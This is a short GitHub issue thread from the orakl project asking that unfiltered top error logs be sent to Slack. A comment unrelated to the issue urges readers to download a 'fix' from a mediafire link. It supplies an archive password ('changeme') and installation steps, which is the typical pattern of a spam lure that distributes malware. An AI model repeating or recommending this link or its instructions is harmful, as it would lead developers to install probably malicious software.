### ISSUE TITLE
(Logscribe) slack error logs before filtering

### ISSUE THREAD

**Issue by Intizar-T** [Bisonai/orakl#2235]
After logs are processed and top `5` occurrences are selected for each service and before they are filtered to be sent to github, send all those top occurrence (unfiltered) error logs to slack

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
